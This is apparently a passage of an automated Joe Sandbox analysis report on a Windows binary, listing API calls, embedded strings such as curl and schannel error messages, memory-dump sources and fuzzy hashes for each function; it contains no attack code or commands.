    • Opcode Fuzzy Hash: 1e11502139bf5d5c80a8ea9b1ef463949e304f8eb062936d7f1e9890b3b3e8b6
    • Instruction Fuzzy Hash: 971186B6A00108EFCB04EF94DC45DEE77B6EF84315F108369F8096B382D6359A46CBA5
    APIs
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661F74
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661FCC
      • Part of subcall function 00661F00: @_RTC_CheckStackVars@8.LIBCMT ref: 00661FFA
    • _strlen.LIBCMT ref: 0068CEE2
      • Part of subcall function 00662050: _strlen.LIBCMT ref: 006620BD
      • Part of subcall function 00662050: @_RTC_CheckStackVars@8.LIBCMT ref: 0066217B
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0068D0AD
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _strlen$CheckStackVars@8
    • String ID: %s (%d) %s (%d)$Malformed ACK packet, rejecting$blksize parsed from OACK$requested
    • API String ID: 3286693010-3904120213
    • Opcode ID: 78cdbdff8cb85b86b1d5f75ea3755100208db3f890d08519672fbfd64a7c40ee
    • Instruction ID: 5f06bc8a58bd258e622873ae9cc4759676e75708aac1b7b7c63a9a710e702078
    • Opcode Fuzzy Hash: 78cdbdff8cb85b86b1d5f75ea3755100208db3f890d08519672fbfd64a7c40ee
    • Instruction Fuzzy Hash: 971186B6A00108EFCB04EF94DC45DEE77B6EF84315F108369F8096B382D6359A46CBA5
    APIs
    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,006D3AFC,?,?,006D3AC4,006FA414,?,?), ref: 006D3B1C
    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 006D3B2F
    • FreeLibrary.KERNEL32(00000000,?,?,006D3AFC,?,?,006D3AC4,006FA414,?,?), ref: 006D3B52
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: AddressFreeHandleLibraryModuleProc
    • String ID: CorExitProcess$mscoree.dll
    • API String ID: 4061214504-1276376045
    • Opcode ID: f86dbc15cc988623e2fad456fd2c23f88d8b0d15fe9d38839eae20cd5d24c2d0
    • Instruction ID: 659f1df80d1705d0383d01c49a634780445a8b2c37b6818e9caac53613b18296
    • Opcode Fuzzy Hash: f86dbc15cc988623e2fad456fd2c23f88d8b0d15fe9d38839eae20cd5d24c2d0
    • Instruction Fuzzy Hash: 70F05E30A01759BFCB119B51DE0DBDEBA6AAB04B56F100065E904A62A0CB748F01DA91
    APIs
      • Part of subcall function 006D8FED: HeapAlloc.KERNEL32(00000000,?,?,?,006C18AE,?,?,?,?,?,006352BD,006BD8C4,?,?,006BD8C4), ref: 006D901F
    • _free.LIBCMT ref: 006D5455
    • _free.LIBCMT ref: 006D546C
    • _free.LIBCMT ref: 006D5489
    • _free.LIBCMT ref: 006D54A4
    • _free.LIBCMT ref: 006D54BB
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _free$AllocHeap
    • String ID:
    • API String ID: 1835388192-0
    • Opcode ID: 082dcc031898210d72aac4ab5033d549b5f6ff1ec45769f0a8b9fd855e37ee5f
    • Instruction ID: 8a048bebbfcf10e688dcc008e3c68ca69fb9d52b716f154c55bf741f7397326a
    • Opcode Fuzzy Hash: 082dcc031898210d72aac4ab5033d549b5f6ff1ec45769f0a8b9fd855e37ee5f
    • Instruction Fuzzy Hash: 7551E531E00B04AFDB21DF29CC41AAAB7F6EF54721B10456EE806D7791E731EA41CB84
    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ___from_strstr_to_strchr_strlen
    • String ID:
    • API String ID: 1576176021-0
    • Opcode ID: d10ea1be0ce8a7c41ca5e85f33f414b15f343afec7ce308ecd3098a1c9ee1030
    • Instruction ID: 6e519d977dadf19d5be2aa16fb5fc77c29ed574e590f327a4a6c3adbe234c64f
    • Opcode Fuzzy Hash: d10ea1be0ce8a7c41ca5e85f33f414b15f343afec7ce308ecd3098a1c9ee1030
    • Instruction Fuzzy Hash: A2512970D00109EFDF14DFA8C991AEEBBB6AF45306F248099D815AB385E730AB45DB91
    APIs
    • GetFileType.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?,?,006D0505,00000000,?), ref: 006D02A2
    • GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,006D0505,00000000), ref: 006D02FC
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,006D0505,00000000,?,?,00000000,?,?), ref: 006D038A
    • __dosmaperr.LIBCMT ref: 006D0391
    • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,006D0505), ref: 006D03CE
      • Part of subcall function 006D0735: __dosmaperr.LIBCMT ref: 006D076A
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
    • String ID:
    • API String ID: 1206951868-0
    • Opcode ID: 2f452b88608b0ab3cc67d2c274f4ba31f980259b8b5735fbb21cc65f18fa8e1e
    • Instruction ID: af60f10ae7a27e461a533a3643977059b20b380233de26d4b59b2fc81fc1c70d
    • Opcode Fuzzy Hash: 2f452b88608b0ab3cc67d2c274f4ba31f980259b8b5735fbb21cc65f18fa8e1e
    • Instruction Fuzzy Hash: 09414A71900745AFEB64DFA5D845AAFBBFAEF89300B10452EF556D3711EB30A901CB20
    APIs
    • _free.LIBCMT ref: 006D42B9
    • _free.LIBCMT ref: 006D42D9
    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 006D433A
    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 006D434C
    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 006D4359
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: __crt_fast_encode_pointer$_free
    • String ID:
    • API String ID: 366466260-0
    • Opcode ID: 21ba6f9add41e1fccb00d8a66b649eac510ab86da91e1d4d02a0f211e8811f6a
    • Instruction ID: de80e021e7d2d21c7966d433c9ca80fe757e1bf43a18175d8dc3d54ddb5c131b
    • Opcode Fuzzy Hash: 21ba6f9add41e1fccb00d8a66b649eac510ab86da91e1d4d02a0f211e8811f6a
    • Instruction Fuzzy Hash: 5B41A276E00204AFCB10EF6CC891A9EB7A6EF89714F16456AE555EB351DA31ED01CB80
    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ___from_strstr_to_strchr$_strlen
    • String ID:
    • API String ID: 3484544846-0
    • Opcode ID: 1c846e57703e5c29621b1aebe09b643578009cfb8cc4352d8e608558c169fd07
    • Instruction ID: 4fd58c6d725d9a1d8e9ae0345709893f9022bda98ee5c99e741e578feb7cbf78
    • Opcode Fuzzy Hash: 1c846e57703e5c29621b1aebe09b643578009cfb8cc4352d8e608558c169fd07
    • Instruction Fuzzy Hash: 764140B5D0020AEFDF40DFE8D941ABEB7B6BF05304F14855DE829A7302E6319A00CBA5
    APIs
    • RegisterServiceCtrlHandlerW.ADVAPI32(?,00641360), ref: 00641320
    • GetLastError.KERNEL32 ref: 00641339
    • __CxxThrowException@8.LIBVCRUNTIME ref: 0064134B
    • SetServiceStatus.ADVAPI32(?), ref: 00641458
    • SetServiceStatus.ADVAPI32(?,00000008), ref: 0064148B
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: Service$Status$CtrlErrorException@8HandlerLastRegisterThrow
    • String ID:
    • API String ID: 2582692417-0
    • Opcode ID: 412757fbc84d4444cd5f3642b7e21374dbdfe400428429a174c222b0e31b2502
    • Instruction ID: a12a10e50a8dc0d7b1ad4d8d83282370976d0c1dc350ebdc4244feb489733339
    • Opcode Fuzzy Hash: 412757fbc84d4444cd5f3642b7e21374dbdfe400428429a174c222b0e31b2502
    • Instruction Fuzzy Hash: 5F3170B5500708DFC720DF55E805B56BBF9FB49710F00862EE9498BB51CB36A554CFA8
    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ___from_strstr_to_strchr_strlen$_strstr
    • String ID:
    • API String ID: 3431573467-0
    • Opcode ID: 63ff20d60cb2190a47ad13ef402798bea1fa5f7f012005f89103372860b153a4
    • Instruction ID: 36d7cf967621405da2a59994037b09cf35f3268a908ba951ee0bd7cf2da107d8
    • Opcode Fuzzy Hash: 63ff20d60cb2190a47ad13ef402798bea1fa5f7f012005f89103372860b153a4
    • Instruction Fuzzy Hash: FD21E9B5D0020DEFCF00EF98D951AADBBB6AB46344F2084A8E8056B341E2749F84DF85
    APIs
    • _free.LIBCMT ref: 006E1222
      • Part of subcall function 006D8FB3: HeapFree.KERNEL32(00000000,00000000,?,006E14AC,?,00000000,?,?,?,006E174F,?,00000007,?,?,006E1BF4,?), ref: 006D8FC9
      • Part of subcall function 006D8FB3: GetLastError.KERNEL32(?,?,006E14AC,?,00000000,?,?,?,006E174F,?,00000007,?,?,006E1BF4,?,?), ref: 006D8FDB
    • _free.LIBCMT ref: 006E1234
    • _free.LIBCMT ref: 006E1246
    • _free.LIBCMT ref: 006E1258
    • _free.LIBCMT ref: 006E126A
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 6ba65589d91207322c6169dbd642bd8d0a5906963b38aecb7c01c249de4d5d45
    • Instruction ID: 7de37eff7723f2bedd7c8f4a6dafb21a600313de3ac931fda25fb212d436508a
    • Opcode Fuzzy Hash: 6ba65589d91207322c6169dbd642bd8d0a5906963b38aecb7c01c249de4d5d45
    • Instruction Fuzzy Hash: 01F04F32909340EFC660EB59E989C4AB7DBAA01B50354480AF618DB791CE34FDC09E98
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _strcspn
    • String ID: $xo$(xo
    • API String ID: 3709121408-2036862407
    • Opcode ID: 43839d82540061b4e440ad1ee2c683b4b467d9db9bd4e82e42efddb7d6bb06bb
    • Instruction ID: 2a8403ad8ffdd0080ef9b01f9afddeda475dbb1e3a9f4f2f4f29e1204ac57075
    • Opcode Fuzzy Hash: 43839d82540061b4e440ad1ee2c683b4b467d9db9bd4e82e42efddb7d6bb06bb
    • Instruction Fuzzy Hash: C9F18B71A00259DFEF04DFA8C984AEEBBB6FF49304F144069E905AB352D731A941CBA1
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00682DF5
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661F74
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661FCC
      • Part of subcall function 00661F00: @_RTC_CheckStackVars@8.LIBCMT ref: 00661FFA
    Strings
    • schannel: ApplyControlToken failure: %s, xrefs: 00682B5B
    • schannel: shutting down SSL/TLS connection with %s port %hu, xrefs: 00682ABA
    • schannel: failed to send close msg: %s (bytes written: %zd), xrefs: 00682C8D
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8_strlen
    • String ID: schannel: ApplyControlToken failure: %s$schannel: failed to send close msg: %s (bytes written: %zd)$schannel: shutting down SSL/TLS connection with %s port %hu
    • API String ID: 1951014933-116363806
    • Opcode ID: 5b95c7b8d0a2308721edb843035baee35bfdd5321cfb39e68c9955265cba989e
    • Instruction ID: 2341a398f1cd3358c1813a94ad6238532a673f0a2d57aad5a64368f712f8aaca
    • Opcode Fuzzy Hash: 5b95c7b8d0a2308721edb843035baee35bfdd5321cfb39e68c9955265cba989e
    • Instruction Fuzzy Hash: 35E15BB5A00109AFCB14DF58D895FAEB7B6FF48304F148299E9196B392C731AD81CB90
    APIs
      • Part of subcall function 00663A10: @_RTC_CheckStackVars@8.LIBCMT ref: 00663C1F
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0065F793
    Strings
    • Couldn't resolve host '%s', xrefs: 0065F686
    • Unix socket path too long: '%s', xrefs: 0065F545
    • Couldn't resolve proxy '%s', xrefs: 0065F761
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: Couldn't resolve host '%s'$Couldn't resolve proxy '%s'$Unix socket path too long: '%s'
    • API String ID: 930174750-3812100122
    • Opcode ID: 327dcbaa0dc4a3247920e7fefdab027b7212c3b78a595504c1410a21694541a6
    • Instruction ID: 34bdcaffae4ef1ac8e472290870e9a7deb4835f645e0fa63b04dff1631b1fa17
    • Opcode Fuzzy Hash: 327dcbaa0dc4a3247920e7fefdab027b7212c3b78a595504c1410a21694541a6
    • Instruction Fuzzy Hash: BDB18974A00209EFCB04CF98D885BEEB7B2EF88315F148179ED19AB351D771AA45CB91
    APIs
    • ___from_strstr_to_strchr.LIBCMT ref: 0067D067
    • ___from_strstr_to_strchr.LIBCMT ref: 0067D087
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0067D25D
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ___from_strstr_to_strchr$CheckStackVars@8
    • String ID: .
    • API String ID: 2899561186-248832578
    • Opcode ID: ef529cb33147cda6c31fbfb343ac9ef002d827f9a8fd9e2e23cd80162fe057cc
    • Instruction ID: f9f2218fca4b2b125720b0cf7c652103f435c4ef324c058e324d6214ff6fb395
    • Opcode Fuzzy Hash: ef529cb33147cda6c31fbfb343ac9ef002d827f9a8fd9e2e23cd80162fe057cc
    • Instruction Fuzzy Hash: DCA1E371E042189FCF14CFA8D890BEDBBB2BF89304F148519E50ABB345D735A986CB64
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ___from_strstr_to_strchr_strlen
    • String ID: ?
    • API String ID: 1576176021-1684325040
    • Opcode ID: 11507656709de9a271ac2b3f58b2cf3e09b8243df102f8ef20de4dcceb53f8a0
    • Instruction ID: 478f92b9256fcd7f8ca5ee7f34d93597d9cfde833f7a22774ebf334cdd09c32e
    • Opcode Fuzzy Hash: 11507656709de9a271ac2b3f58b2cf3e09b8243df102f8ef20de4dcceb53f8a0
    • Instruction Fuzzy Hash: E591A4B490438ACFCB05DF58C890BAE7BB2FF85304F144959E8259B346D375EA60CBA5
    APIs
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0064A226
    • __allrem.LIBCMT ref: 0064A246
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0064A3C7
      • Part of subcall function 006BF9C0: _RTC_StackFailure.LIBCMT ref: 006BF9FD
    Strings
    • Internal error removing splay node = %d, xrefs: 0064A349
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: Stack$CheckFailureUnothrow_t@std@@@Vars@8__allrem__ehfuncinfo$??2@
    • String ID: Internal error removing splay node = %d
    • API String ID: 825011786-2589534965
    • Opcode ID: f653be6b30606a759a62869b8c641a4c17c120f357567000e4e3e9f0f3746d8e
    • Instruction ID: cc14d0ddbcf0d707c8de6ac908088177a8ade68a0485ca731807501fac25a86e
    • Opcode Fuzzy Hash: f653be6b30606a759a62869b8c641a4c17c120f357567000e4e3e9f0f3746d8e
    • Instruction Fuzzy Hash: 22810DB5E002099FDB44DF98C881AAEFBB6FF48304F14C169E909AB351D735A981CF95
    APIs
      • Part of subcall function 006D7248: GetConsoleCP.KERNEL32(?,00000000,00000000), ref: 006D7290
    • WriteFile.KERNEL32(?,00000000,5C2E5C5C,?,00000000,?,00000000,00000000,00000000,?,58383025,?,00000000,?,5C2E5C5C,58383025), ref: 006D7C04
    • GetLastError.KERNEL32 ref: 006D7C0E
    • __dosmaperr.LIBCMT ref: 006D7C53
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ConsoleErrorFileLastWrite__dosmaperr
    • String ID: \\.\%08X
    • API String ID: 251514795-2184389390
    • Opcode ID: 70e32ad302ab517f7e88234d7e6bb20d3fb2cbc75de4b981268f75df32fc9e51
    • Instruction ID: 1764ca69f96130a1c0e886abd3b08ef333f24b2fd68cc9348e95c4d94b76e905
    • Opcode Fuzzy Hash: 70e32ad302ab517f7e88234d7e6bb20d3fb2cbc75de4b981268f75df32fc9e51
    • Instruction Fuzzy Hash: 6D51B171E0820AAFDB109FA4C845FEEBBBAEF09314F14055BE400AB351F6749D41C766
    APIs
      • Part of subcall function 006E0066: GetOEMCP.KERNEL32(00000000,006E02D8,?,al%08X,?,?,006C610D,58383025,00000000), ref: 006E0091
    • IsValidCodePage.KERNEL32(-00000030,00000000,?,%08X,?,al%08X,006E031F,?,00000000,00000000,?,%08X), ref: 006E052F
    • GetCPInfo.KERNEL32(00000000,006E031F,?,al%08X,006E031F,?,00000000,00000000,?,%08X,?,?,?,?,006C610D,58383025), ref: 006E0571
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CodeInfoPageValid
    • String ID: al%08X$%08X
    • API String ID: 546120528-2095630812
    • Opcode ID: ef3f1aa4f5f304dfb8b1919b1e22e9403f6674cbdcaa79cb95fd8e41a7a570b9
    • Instruction ID: 80f977b218b063ab2074fa2336935262c1d75fd3fc61d8bbaac05a4ade833366
    • Opcode Fuzzy Hash: ef3f1aa4f5f304dfb8b1919b1e22e9403f6674cbdcaa79cb95fd8e41a7a570b9
    • Instruction Fuzzy Hash: FD51F7B0A013859EEB218F67C5407FBBBE7EF91304F14456ED0968B252E7B89586CF50
    APIs
    • ___from_strstr_to_strchr.LIBCMT ref: 0065F200
